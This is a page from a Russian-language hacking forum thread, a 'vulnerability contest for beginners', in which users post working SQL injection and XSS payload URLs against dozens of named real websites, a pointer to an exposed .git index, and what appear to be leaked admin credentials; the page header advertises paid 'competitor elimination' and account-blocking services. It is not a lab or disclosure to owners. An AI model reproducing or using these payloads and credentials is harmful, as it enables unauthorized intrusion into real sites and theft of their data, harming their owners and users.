УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Конкурс уязвимостей для новичков

Страница 10 из 15

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#91

12.10.2015, 21:13

grimnir

Guest

Сообщений: n/a

Провел на форуме:
216062

Репутация: 231

Цитата:

Сообщение от ubepkr

ubepkr said:
↑
Согласен на 100%. Я не обсуждал уязвимость, а старался ее расширить. Постараюсь не писать больше в этой теме.
grimnir: Вы, как всегда, в ударе)) Если не секрет, ЧЕМ (я про админку)??? я опробовал все, что только можно))

Не секрет, привычка проверять на индекс-файл гит http://skywatcher.com/.git/index тут вся структура сайта

#92

17.10.2015, 23:01

antikonstantin

Guest

Сообщений: n/a

Провел на форуме:
1078

Репутация: 0

Сайт: http://www.calidus.ro/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.calidus.ro/en/news.php?id=999999.9 union all select 1,[t],3,4

Сайт: http://www.protek.fr

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.protek.fr/achat/index.php?catid=999999.9 union all select 1,[t]--

Сайт: http://www.parskado.com

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.parskado.com/category.php?CATID=999999.9 union all select [t],2

Сайт: http://www.worldofbirds.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.worldofbirds.com/products.php?prodID=999999.9 union all select [t],2,3

Сайт: http://www.trinews.at/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.trinews.at/index.asp?CID=[t]

Сайт: http://www.gotmachinery.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.gotmachinery.com/gmbrowsetype.php?subcat_id=273' and [t] and '1'='1&lang_id=

Сайт: http://www.metalmate.in/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.metalmate.in/product_detail.php?subcat_id=1' and [t] and '1'='1&cat_id=1&subsubcat_id=5

Сайт: http://bazarvidal.com.br/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://bazarvidal.com.br/detcat.cfm?id=[t]

Сайт: http://www.fertilita.org/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.fertilita.org/index.asp?CatID=999999.9 union all select 1,[t],3,4,5,6,7,8,9

Сайт: http://www.phcqa.org/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.phcqa.org/measures/category.php?category_id=[t]

Сайт: http://www.jeannius.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.jeannius.com/websys/store_mainpage.php?cat_id=999999.9 union all select 1,[t],3,4&subcat_id=46

Сайт: http://www.pad10.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.pad10.com/pad10/project_listing_category.php?subcat_id=11' and [t] and '1'='1

Сайт: http://www.foldermate.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.foldermate.com/product_list.php?lang=en&id=F4C2DE0E-8D10-421E-B4EF-A8D67B7836E9999999.9' union all select 1,2,3,4,5,6,7,8,9,10,11,[t],13,14,15,16 and '0'='0

Сайт: http://www.kingscommodities.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.kingscommodities.com/products.php?prodid=999999.9 union all select 1,[t],3,4,5,6

Сайт: http://www.architrend.com.au/

Уязвимость: SQLi

Эксплоит:

http://www.architrend.com.au/product-details.php?

Код:

Code:
category_id=46&product_id=706' and [t] and '1'='1

Сайт: http://www.bellmtcs.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.bellmtcs.com/store/index.php?cid=121 or 1=[t] and 1=1

Сайт: http://office.altakadom.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://office.altakadom.com/products.php?subcat_id=130' and [t] and '1'='1

admin indi@2011

Сайт: http://www.sb2online.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.sb2online.com/view_item.php?prodid=999999.9 union all select 1,2,[t],4

Сайт: http://old.harbourfood.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://old.harbourfood.com/products/default.php?cat=Equipment&cls=&subcls=&vendor=[t]

Сайт: http://www.ptsrentals.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.ptsrentals.com/catalog.php?c=999999.9 union all select [t],2,3,4,5,6,7,8,9

Сайт: http://www.savillsguardian.com.hk/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.savillsguardian.com.hk/html/customer/index.asp?id=1594' or 1=[t] and '1'='1

Сайт: http://www.arroxx.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.arroxx.com/catalogue.php?pID=[t]

Сайт: http://michiganlakeproducts.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://michiganlakeproducts.com/productpage.php?PID=[t]

Сайт: http://www.a3com.net/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.a3com.net/product-list.php?cat_id=[t]

admina3com a3com@emirates.net.ae admin

Сайт: http://www.mslibrary.org/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.mslibrary.org/mountjoy/cwp/browse.asp?c=43915&a=[t]&BMDRN=2000&BCOB=0

Сайт: http://rdmpro.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://rdmpro.com/product-details.php?pid=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,[t],13,14,15,16,17

Сайт: http://www.estheticsglobal.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.estheticsglobal.com/cat.php?id=999999.9 union all select 1,2,3,4,5,6,[t],8,9,10

Сайт: http://overlandindustries.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://overlandindustries.com/productDetail.php?productID=999999.9 union all select 1,2,[t],4,5,6

Сайт: http://www.casacrystal.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.casacrystal.com/detail.php?cid=[t]&id=3

Сайт: http://www.brightonretail.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://www.brightonretail.com/calendar/monthly_view.php?cid=999999.9 union all select 1,2,3,4,5,[t],7,8--&catid=&m=10&w=5&y=2015&s=

Сайт: http://scclbd.com/

Уязвимость: SQLi

Эксплоит:

Код:

Code:
http://scclbd.com/viewproduct.php?prodid=999999.9 union all select 1,2,3,4,5,[t],7,8

#93

19.10.2015, 14:42

aldemko

Guest

Сообщений: n/a

Провел на форуме:
12627

Репутация: 0

Всем привет

Прошу не судить строго - я вообще только начинаю читать мануалы

мой первый найденный SQL Inj (искал в ручную, перебирая сайты из выдачи Google)

Код:

Code:
http://www.illaricegrill.it/readnews.php?id=22+union+select+1,version(),database(),4,user()

5.5.38-35.2-log

icsa1_1

mi-_a-nics

Windows 2008 R2 or 7

ASP.NET, Microsoft IIS 7.5

MySQL 5.0.12

DBA: False

PS

Код:

Code: http://www.trendy.dk/news/readnews.php?id=999999+union+select+1,2,user(),database(),version(),6

#94

23.10.2015, 17:53

White Raven

Guest

Сообщений: n/a

Провел на форуме:
1099

Репутация: 0

http://www.automodern.by

1) Parameter s in /wordpress/?s=&=Search is vulnerable to ">alert('xss') XSS input. уязвимость XSS

Код:

Code:
http://www.automodern.by/wordpress/?s=">alert('xss')&=Search

2) Parameter id in /index.php?id=171 is vulnerable to ' input. уязвимость SQL

Код:

Code:
http://www.automodern.by:80/index.php?id='

ссори я новичок.

#95

23.10.2015, 19:20

MaxFast

Guest

Сообщений: n/a

Провел на форуме:
178623

Репутация: 94

Цитата:

Сообщение от White Raven

White Raven said:
↑
http://www.automodern.by
1) Parameter s in /wordpress/?s=&=Search is vulnerable to ">alert('xss') XSS input. уязвимость XSS

Код:

Code:
http://www.automodern.by/wordpress/?s=">alert('xss')&=Search

2) Parameter id in /index.php?id=171 is vulnerable to ' input. уязвимость SQL

Код:

Code:
http://www.automodern.by:80/index.php?id='

ссори я новичок.

Код:

Code:
http://www.automodern.by/index.php?id=-1+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

#96

23.10.2015, 19:34

White Raven

Guest

Сообщений: n/a

Провел на форуме:
1099

Репутация: 0

Цитата:

Сообщение от MaxFast

MaxFast said:
↑

Код:

Code:
http://www.automodern.by/index.php?id=-1+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

я не понял какой код писать что писать уязвимость нашел вроде

#97

24.10.2015, 10:59

Shubka75

Guest

Сообщений: n/a

Провел на форуме:
11851

Репутация: 30

Сайт: www.pc-infopratique.com

Уязвимость: SQLi

Эксплоит:

Код:

Code:
www.pc-infopratique.com/rss/down_rss.php?rub=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--

#98

04.11.2015, 21:28

SS_47

Guest

Сообщений: n/a

Провел на форуме:
3772

Репутация: 7

Сайт: http://www.wrekage.org/

Уязвимость: SQLi

Код:

Code:
http://www.wrekage.org/reviews.php?id=-1/*!50000union*//*!50000select*/1,/*!50000version()*/,3,4,5,6,7--

#99

04.11.2015, 23:34

SS_47

Guest

Сообщений: n/a

Провел на форуме:
3772

Репутация: 7

Сайт: http://www.rochesterlancers.com/

Уязвимость: SQL injection

Код:

Code:
http://www.rochesterlancers.com/schedule/?season=10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26,27,28,29,30--

#100

26.11.2015, 11:24

ubepkr

Guest

Сообщений: n/a

Провел на форуме:
32618

Репутация: 1

Сайт: https://www.silhouettedesignstore.com/

Уязвимость: Reflected XSS (циклящийся (понаблюдайте за страницей), можно без '"-->, но так интереснее))))

Код:

Code:
https://www.silhouettedesignstore.com/designs?search='"-->alert(123)

там же Frame Injections

Код:

Code:
https://www.silhouettedesignstore.com/designs?search=

Сайт: http://getbitco.com/

Уязвимость: Reflected XSS

Код:

Code:
http://getbitco.com/?ans=Erroralert(123456789)

Сайт: http://http:/bitganancias.com/

Уязвимость: XSS

Код:

Code:

         
         
         
    
     HTMLFormElement.prototype.submit.call(document.forms[0]);

Страница 10 из 15

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход